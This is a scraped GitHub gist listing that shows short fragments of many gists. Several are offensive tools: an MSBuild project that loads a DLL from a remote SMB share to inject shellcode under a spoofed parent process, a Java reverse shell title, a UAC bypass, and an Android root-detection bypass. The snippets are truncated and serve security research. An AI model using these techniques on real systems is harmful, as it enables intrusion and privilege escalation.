rvrsh3ll / msbuild_inline_task_parent_process_spoof.txt

Last active August 2, 2021 20:00

	<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="MyTarget">
	<SimpleTask MyProperty="My voice is my passport."
	MyCode='<base64 encoded x64 shellcode>'
	MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
	</Target>
	<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
	</Project>

FrankSpierings / generate-java-reverse-shell-ssl.sh

Last active March 21, 2023 03:45

Java reverse shell

gentilkiwi / NCryptCreatePersistedKey_virtual_iso.c

Created November 16, 2019 00:29

	#define NCRYPT_VIRTUAL_ISO_MAYBE 0x10000
	#define NCRYPT_VIRTUAL_ISO 0x20000
	#define NCRYPT_PER_BOOT_KEY 0x40000

	NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[])
	{
	SECURITY_STATUS status;
	NCRYPT_PROV_HANDLE hCngProv = 0;
	NCRYPT_KEY_HANDLE hCngKey = 0;
	DWORD keyLen = 2048;

Code-Egg / M2-crawler.sh

Created November 10, 2019 04:40

	#Author :LiteSpeedtech
	#date :20191023
	#version :1.7.3
	#Require :Prepare site map XML
	# Allow LSCache crawler
	#=======================================================

	AGENTDESKTOP='User-Agent: lscache_runner'
	AGENTMOBILE='User-Agent: lscache_runner iPhone'
	SVALUE="0.1"

unbaiat / akagi_58a.c

Created October 24, 2019 13:43 — forked from hfiref0x/akagi_58a.c

UAC bypass using EditionUpgradeManager COM interface


	typedef interface IEditionUpgradeManager IEditionUpgradeManager;

	typedef struct IEditionUpgradeManagerVtbl {

	BEGIN_INTERFACE

	HRESULT(STDMETHODCALLTYPE *QueryInterface)(
	__RPC__in IEditionUpgradeManager * This,
	__RPC__in REFIID riid,

xpn / tasks.cs

Created August 19, 2019 13:56

Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly

	using System;
	using System.EnterpriseServices;
	using System.Runtime.InteropServices;

	using System.Reflection;
	using System.Reflection.Emit;

	using System.Collections;
	using System.Collections.Generic;

robbmanes / watch-unix-socket.stp

Last active October 17, 2024 07:43

Systemtap script to watch UNIX socket input

	/*
	* watch_unix_socket.stp
	*
	* This is a simply more modern version of the script found here:
	* https://sourceware.org/systemtap/wiki/WSunixSockets
	*
	* The first argument is the location of the file descriptor for a UNIX socket.
	* To find this address, for example, for the Docker socket run:
	*
	* # lsof 2>&1 \| awk '/docker.sock/ {print $7}' \| grep -v '0t0' \| sort -u

pich4ya / root_bypass.js

Created August 5, 2019 20:14

Bypass Android Root Detection / Bypass RootBeer - August 2019

	// $ frida -l antiroot.js -U -f com.example.app --no-pause
	// CHANGELOG by Pichaya Morimoto ([email protected]):
	// - I added extra whitelisted items to deal with the latest versions
	// of RootBeer/Cordova iRoot as of August 6, 2019
	// - The original one just fucked up (kill itself) if Magisk is installed lol
	// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
	// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
	Java.perform(function() {

	var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",

chansdad / rpi.md

Created June 12, 2019 07:21 — forked from jimyang2008/rpi.md

Raspberry Pi

Notes on Raspberry Pi

Initial default username password for Raspbian

username: pi
password: raspberry

Need to add US support in addition to default GB, including language, keyboard, etc.

$ raspi-config

unbaiat / foxyproxy.json

Created June 3, 2019 06:49 — forked from liamosaur/foxyproxy.json